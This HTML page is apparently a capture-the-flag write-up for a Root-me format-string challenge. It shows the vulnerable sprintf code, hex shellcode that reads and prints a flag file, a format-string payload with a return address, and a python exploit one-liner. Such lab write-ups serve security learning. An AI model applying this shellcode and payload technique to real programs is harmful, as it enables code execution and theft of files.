<html>
 <head>
<title> Format overflow  </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Root-me </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Format String Bug 3  </h1>
   
 <br> 

<code>
char    outbuf[512];
char    buffer[512];
char    user[12]; 
 ...
fgets(user, sizeof(user), stdin);
user[strlen(user) - 1] = '\0';
...
sprintf (buffer, "ERR Wrong user: %400s", user);
sprintf (outbuf, buffer);  # the vulnerable part ... it has no format string 
</code>
<br>
<p>This question was little different .. you had to overflow the buffer using format string vuln ...  <br>
    and you can use only 10 bytes to exploit so the only was to load the shellcode into env variable and feed it's address to eip ..<br>
    but i had some problem with execve() shellcode so i used cat(.passwd) code and got the ans ...</p>

<br>
<code>char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"flag.txt";
</code>
<br>
<code>payload="%121u"+pack(0xffffd4ce) </code>
<br>

<h2>Another way to solve it using execve() shellcode  </h2>
<code>(python -c ’print "%125d\xd1\xfe\xff\xbf"’;cat) | ./ch17 </code>
<br>
<p> I didnt use ;cat i was trying ./ch17 < imp instead ....</p>
 

</body>
</html>